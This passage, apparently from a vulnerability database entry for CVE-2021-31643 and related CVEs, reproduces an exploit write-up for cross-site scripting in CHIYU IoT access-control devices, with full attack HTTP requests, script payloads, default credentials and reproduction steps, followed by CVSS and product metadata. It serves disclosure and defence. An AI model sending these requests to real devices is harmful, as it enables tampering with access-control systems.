GET /ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY HTTP/1.1 Host: 192.168.187.143 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.143/wan_pe.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1
Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (ppp.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_servicename) 4. Submit the request and observe payload execution
============= PoC 04 ===============
Affected parameter: TF_port=Component: man.cgi
Payload: /">
GET /man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/manage.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1
Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (man.cgi) 3. Append the payload at the end of the vulnerable parameter (TF_port) 4. Submit the request and observe payload execution
2: Unauthenticated XSS in several CHIYU IoT devices
CVE ID: CVE-2021-31641 Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641
Component: any argument passed via URL that results in an HTTP-404 Payload: http://ip/alert(123)
Steps to reproduce: 1. Navigate to the webpage of the vulnerable device 2. On the web-browsers, you need to append the payload after the IP address (see payload above) 3. Submit the request and observe payload execution
3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
CVE ID: CVE-2021-31643 Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643
Affected parameter: username= Component: if.cgi Payload: ">alert(1)
HTTP request - SEMAC Web Ver7.2
GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/EmpRcd.htm Cookie: fresh=; remote=00000000 Upgrade-Insecure-Requests: 1
HTTP request - BIOSENSE-III-COMBO(M1)(20000)
GET /if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3 Accept-Encoding: gzip, deflate Authorization: Basic YWRtaW46YWRtaW4= Connection: close Referer: http://127.0.0.1/EmpRcd.htm Cookie: fresh= Upgrade-Insecure-Requests: 1
Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to component mentioned (if.cgi) 3. Append the payload at the end of the vulnerable parameter (username) 4. Submit the request and observe payload execution
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202106-1313",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "semac d4",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "bf-631",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac d1",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "webpass",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac d2",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac d2 n300",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "bf-630",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac s1 osdp",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac s2",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac s3v3",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "biosense",
"scope": "eq",
"trust": 1.0,
"vendor": "chiyu tech",
"version": null
},
{
"model": "semac s3v3",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac d2 n300",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac s1 osdp",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac s2",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac d1",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "bf-631",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "bf-630",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac d4",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "semac d2",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
},
{
"model": "webpass",
"scope": null,
"trust": 0.8,
"vendor": "chiyu",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:bf-631_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:bf-631:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:bf-630_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:bf-630:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_s2_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_d1_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_d1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_d2_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_d2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_d4_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_d4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_s3v3_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_s3v3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_d2_n300_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_d2_n300:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_s1_osdp_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_s1_osdp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:webpass_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:webpass:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:biosense_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:biosense:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "sirpedrotavares",
"sources": [
{
"db": "PACKETSTORM",
"id": "162887"
}
],
"trust": 0.1
},
"cve": "CVE-2021-31643",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 3.5,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-31643",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.4,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2021-31643",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "Low",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-31643",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202106-019",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter. An attacker can use this vulnerability to execute client code. # Exploit Title: CHIYU IoT devices - \u0027Multiple\u0027 Cross-Site Scripting (XSS)\n# Date: May 31 2021\n# Exploit Author: sirpedrotavares\n# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html\n# Software Link: https://www.chiyu-tech.com/category-hardware.html\n# Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions \u003c June 2021\n# Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC\n# CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643\n# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks\n\nDescription: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws. \n\n#1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices\nCVE ID: CVE-2021-31250\nCVSS: Medium \u2013 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\nURL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250\n\n============= PoC 01 ===============\nAffected parameter: TF_submask\nComponent: if.cgi\nPayload: \"\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n\nHTTP Request:\nGET\n/if.cgi?redirect=setting.htm\u0026failure=fail.htm\u0026type=ap_tcps_apply\u0026TF_ip=443\u0026TF_submask=0\u0026TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E\u0026radio_ping_block=0\u0026max_tcp=3\u0026B_apply=APPLY\nHTTP/1.1\nHost: 192.168.187.12\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101\nFirefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.187.12/ap_tcps.htm\nAuthorization: Basic OmFkbWlu\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to component mentioned (if.cgi)\n 3. Append the payload at the end of the vulnerable parameter (TF_submask)\n 4. Submit the request and observe payload execution\n\n ============= PoC 02 ===============\nAffected parameter: TF_hostname=Component: dhcpc.cgi\nPayload: /\"\u003e\u003cimg src=\"#\"\u003e\nHTTP request and response:\n\nHTTP Request:\nGET\n/dhcpc.cgi?redirect=setting.htm\u0026failure=fail.htm\u0026type=dhcpc_apply\u0026TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22\u0026S_type=2\u0026S_baud=3\u0026S_userdefine=0\u0026AP_type=0\u0026TF_port=443\u0026TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E\u0026B_apply=APPLY\nHTTP/1.1\nHost: 192.168.187.12\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101\nFirefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.187.12/wan_dc.htm\nAuthorization: Basic OmFkbWlu\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to component mentioned (dhcpc.cgi)\n 3. Append the payload at the end of the vulnerable parameter (TF_hostname)\n 4. Submit the request and observe payload execution\n\n ============= PoC 03 ===============\nAffected parameter: TF_servicename=Component: ppp.cgi\nPayload: \"\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n\nGET\n/ppp.cgi?redirect=setting.htm\u0026failure=fail.htm\u0026type=ppp_apply\u0026TF_username=admin\u0026TF_password=admin\u0026TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E\u0026TF_idletime=0\u0026L_ipnego=DISABLE\u0026TF_fixip1=\u0026TF_fixip2=\u0026TF_fixip3=\u0026TF_fixip4=\u0026S_type=2\u0026S_baud=3\u0026S_userdefine=0\u0026AP_type=0\u0026TF_port=443\u0026TF_remoteip1=0.0.0.0\u0026B_apply=APPLY\nHTTP/1.1\nHost: 192.168.187.143\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101\nFirefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.187.143/wan_pe.htm\nAuthorization: Basic OmFkbWlu\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to component mentioned (ppp.cgi)\n 3. Append the payload at the end of the vulnerable parameter\n(TF_servicename)\n 4. Submit the request and observe payload execution\n\n============= PoC 04 ===============\nAffected parameter: TF_port=Component: man.cgi\nPayload: /\"\u003e\u003cimg src=\"#\"\u003e\n\nGET\n/man.cgi?redirect=setting.htm\u0026failure=fail.htm\u0026type=dev_name_apply\u0026http_block=0\u0026TF_ip0=192\u0026TF_ip1=168\u0026TF_ip2=200\u0026TF_ip3=200\u0026TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E\u0026TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E\u0026B_mac_apply=APPLY\nHTTP/1.1\nHost: 192.168.187.12\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101\nFirefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.187.12/manage.htm\nAuthorization: Basic OmFkbWlu\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to component mentioned (man.cgi)\n 3. Append the payload at the end of the vulnerable parameter (TF_port)\n 4. Submit the request and observe payload execution\n\n\n\n#2: Unauthenticated XSS in several CHIYU IoT devices\nCVE ID: CVE-2021-31641\nMedium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N\nURL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641\n\n\nComponent: any argument passed via URL that results in an HTTP-404\nPayload: http://ip/\u003cscript\u003ealert(123)\u003c/script\u003e\n\n\nSteps to reproduce:\n 1. Navigate to the webpage of the vulnerable device\n 2. On the web-browsers, you need to append the payload after the IP\naddress (see payload above)\n 3. Submit the request and observe payload execution\n\n\n#3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices\nCVE ID: CVE-2021-31643\nMedium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N\nURL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643\n\nAffected parameter: username=\nComponent: if.cgi\nPayload: \"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n\nHTTP request - SEMAC Web Ver7.2\n\nGET\n/if.cgi?redirect=EmpRcd.htm\u0026failure=fail.htm\u0026type=user_data\u0026creg=0\u0026num=\u0026EmployeeID=0000\u0026MarkID=0000\u0026CardID=000000\u0026username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E\u0026Card_Valid=0\u0026SY=2021\u0026SM=2\u0026SD=7\u0026sy_h=16\u0026sy_m=23\u0026EY=2021\u0026EM=2\u0026ED=7\u0026sy_h=16\u0026sy_m=23\u0026Activate=5\u0026Usertype=0\u0026group_list1=1\u0026group_list2=0\u0026group_list3=0\u0026group_list4=0\u0026Verify=1\u0026Password=\u0026Retype=\u0026card=0\u0026card=0\u0026card=0\u0026card=0\u0026card=0\u0026card=116\u0026card=9\u0026card=138\nHTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)\nGecko/20100101 Firefox/87.0\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3\nAccept-Encoding: gzip, deflate\nAuthorization: Basic YWRtaW46YWRtaW4=\nConnection: close\nReferer: http://127.0.0.1/EmpRcd.htm\nCookie: fresh=; remote=00000000\nUpgrade-Insecure-Requests: 1\n\n\nHTTP request - BIOSENSE-III-COMBO(M1)(20000)\n\nGET\n/if.cgi?redirect=EmpRcd.htm\u0026failure=fail.htm\u0026type=user_data\u0026creg=0\u0026num=\u0026EmployeeID=3\u0026MarkID=3474\u0026CardID=00000000\u0026emp_id=\u0026username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E\u0026Card_Valid=0\u0026SY=2019\u0026SM=11\u0026SD=25\u0026sy_h=15\u0026sy_m=0\u0026EY=2019\u0026EM=11\u0026ED=25\u0026sy_h=15\u0026sy_m=0\u0026Activate=5\u0026Usertype=0\u0026group_list1=1\u0026group_list2=0\u0026group_list3=0\u0026group_list4=0\u0026Verify=1\u0026Password=\u0026Retype=\u0026card=0\u0026card=0\u0026card=0\u0026card=0\u0026card=118\u0026card=5\u0026card=101\u0026card=110\nHTTP/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)\nGecko/20100101 Firefox/87.0\nAccept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3\nAccept-Encoding: gzip, deflate\nAuthorization: Basic YWRtaW46YWRtaW4=\nConnection: close\nReferer: http://127.0.0.1/EmpRcd.htm\nCookie: fresh=\nUpgrade-Insecure-Requests: 1\n\n\nSteps to reproduce:\n 1. Navigate to the vulnerable device\n 2. Make a GET request to component mentioned (if.cgi)\n 3. Append the payload at the end of the vulnerable parameter (username)\n 4. Submit the request and observe payload execution\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-31643"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
},
{
"db": "PACKETSTORM",
"id": "162887"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-31643",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "162887",
"trust": 2.5
},
{
"db": "JVNDB",
